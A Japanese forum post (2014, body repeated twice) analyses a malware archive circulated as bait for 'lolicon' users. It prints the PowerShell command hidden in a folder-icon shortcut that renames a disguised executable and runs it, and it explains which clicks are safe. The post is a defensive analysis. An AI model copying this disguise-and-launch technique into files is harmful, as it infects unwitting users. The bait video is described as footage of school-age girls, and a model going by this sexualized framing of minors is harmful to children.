【悲報】ロリコンケンモメン達が謎のウイルスに引っかかってパソコソをぶっ壊される ★2
2 :番組の途中ですがアフィサイトへの転載は禁止です:
35+12 :番組の途中ですがアフィサイトへの転載は禁止です [↓] :2014/05/01(木) 02:00:00.83 ID:3I146ai20 (2/25) [PC]
>>22
まとめ
rarの中身
desktop.ini: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit, UPX compressed
mov.lnk: MS Windows shortcut
thumbs.db: Macromedia Flash Video
mov.lnkの内容というかプロパティ↓
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe md 'mov' ;del 'mov.lnk' ;saps mov ;mv thumbs.db mov\mov.flv;sp mov\mov.flv attributes Archive;mv 'desktop.ini' '%temp%\x.exe';saps '%temp%\x.exe';
トラップのシナリオ
・解凍したらファイルが3つでてくる。
・そのうち「mov」と名前が付いてる、「フォルダのアイコン」をしたショートカットがトリガー
・こいつをダブルクリックとか「開く」とかやると
・desktop.ini を、c:\temp\x.exe という名前にリネーム移動
・そいつを実行
アウトとセーフ
・解凍しただけならセーフ
・というか、mov ショートカットに触ってなければ問題ない
・ショートカットをダブルクリックとか「開く」とかしたらアウト、シングルクリックは多分大丈夫
・XPならそもそも↓こんなものは存在しないのでセーフ。vista/7/8は知らん
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
thumbs.db
JCかJSのウェブカメラムービー。ニコ生かなんか?パンツも乳首もない、まあ普通の映像
>>22
まとめ
rarの中身
desktop.ini: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit, UPX compressed
mov.lnk: MS Windows shortcut
thumbs.db: Macromedia Flash Video
mov.lnkの内容というかプロパティ↓
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe md 'mov' ;del 'mov.lnk' ;saps mov ;mv thumbs.db mov\mov.flv;sp mov\mov.flv attributes Archive;mv 'desktop.ini' '%temp%\x.exe';saps '%temp%\x.exe';
トラップのシナリオ
・解凍したらファイルが3つでてくる。
・そのうち「mov」と名前が付いてる、「フォルダのアイコン」をしたショートカットがトリガー
・こいつをダブルクリックとか「開く」とかやると
・desktop.ini を、c:\temp\x.exe という名前にリネーム移動
・そいつを実行
アウトとセーフ
・解凍しただけならセーフ
・というか、mov ショートカットに触ってなければ問題ない
・ショートカットをダブルクリックとか「開く」とかしたらアウト、シングルクリックは多分大丈夫
・XPならそもそも↓こんなものは存在しないのでセーフ。vista/7/8は知らん
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
thumbs.db
JCかJSのウェブカメラムービー。ニコ生かなんか?パンツも乳首もない、まあ普通の映像
|
|
|